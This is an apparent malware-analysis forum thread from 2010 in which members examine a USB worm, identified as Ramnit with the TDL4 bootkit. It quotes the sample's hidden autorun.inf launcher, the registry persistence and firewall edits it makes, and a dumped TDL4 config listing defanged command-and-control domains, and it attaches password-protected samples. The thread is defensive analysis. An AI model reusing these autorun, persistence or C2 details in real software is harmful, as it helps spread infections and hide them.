A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #3855  by wealllbe20
 Mon Dec 06, 2010 5:34 pm
Creates cpl and exe file on the usb stick. in The recycler\(sid) of the usb stick.

Autorun has a bunch of what appears garbage data.

Inside the autorun.inf is hidden:

oFZNCPaKpFqnypMvunsJAUxaulHmNGcfpxcxQWpTWyPLPRKSQjsQhufI
QoxPwiaWhAexFmbQfCMkhSKPqerQopYyGAhHorvIPPREcrSUnACLyfRtyQaRqI
srGYVFTeEeNyyeKVSICYaVrwxoLRvgTMtsPfDoSIjdpqmZkLAgKdU
UePqxwFZoNubGgTFYLfpmYELeDkWsNVeXnGdjUObhqyrhMAErRqscxkakCplNWQhBFZOGgh
aYvQfnbdwreDkCxhnEyhplBaADYULsoWuGegXGgjuJtZXwBqb
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
shell\explore\command=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-7-8-43-5010723741-8584364467-787650441-0075\hqiRHBJM.exe
kTxSrBsVFIdVCQrfZDDOqweGuedBBMtoIaoWovaKaqPduMpQFmNBKQyDFYBJoicxILbnC
wNCJnZlQQwmhfEvOijCDKYOBrDOcEpyMsCbpBcRSVISXJpepadpsLjVimAIXFcytgSUmoOEyAPSrCaXOcpibyix

also infects c:\program files and current user startup folder.
Attachments
password infected
(78.88 KiB) Downloaded 77 times
 #3858  by Meriadoc
 Tue Dec 07, 2010 1:50 am
Thanks. Create Win32.Ramnit + TDL4.03, mbr infected but then I receive a STOP: unknown hard error.

edit :

Modifies registry key HKEY_LOCAL_MACHINE\software\microsoft\windows NT\currentVersion\Winlogon\UserInit (C:\WINDOWS\system32\userinit.exe,)
is changed to <C:\WINDOWS\system32\userinit.exe,,C:\Program Files\McXQeAiBþ¯¸•Ëvpjtxjct.exe\vpjtxjct.exe>

Registry key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Program Files\Internet Explorer\IEXPLORE.EXE
set to <C:\Program Files\Internet Explorer\IEXPLORE.EXE:*:Enabled:Internet Explorer>

created C:\Documents and Settings\user\Start Menu\Programs\Startup\vpjtxjct.exe

process IEXPLORE.EXE

infects MBR with Bootkit

TDL 4.03
[main]
version=0.03
aid=40592
sid=0
rnd=1757981266
knt=1291690128
[inject]
*=cmd.dll
* (x64)=cmd64.dll
[cmd]
srv=hxxps://zz87lhfda88.com/;hxxps://01n02n4cx00.com/;hxxps://1l1i16b0.com/;hxxps://zz87ihfda88.com/;hxxps://10n02n4cx00.com/
wsrv=hxxp://pxlaratotor.com/;hxxp://aurelenopkin.com/;hxxp://teiretorkei.com/;hxxp://backlistcheck.com/;hxxp://cilkcpixleabn.com/
psrv=hxxp://advcpworld.com/
version=0.15
bsh=c388ec50962a4978a3cdb1cef1c864884e520578
delay=7200
csrv=hxxp://z0g7yail0.com/
 #3867  by wealllbe20
 Tue Dec 07, 2010 4:56 pm
http://virscan.org/report/d1df877dbe44d ... 9f519.html

Infects autorun.inf

appears to make long random file name on the usb drive.

Also puts itself in %appdata%\bdepdf.exe so it can infect other usb drives... That is all I could find sandboxed software doesn't appear to show much on this malware.
Attachments
Password Infected
(176.49 KiB) Downloaded 81 times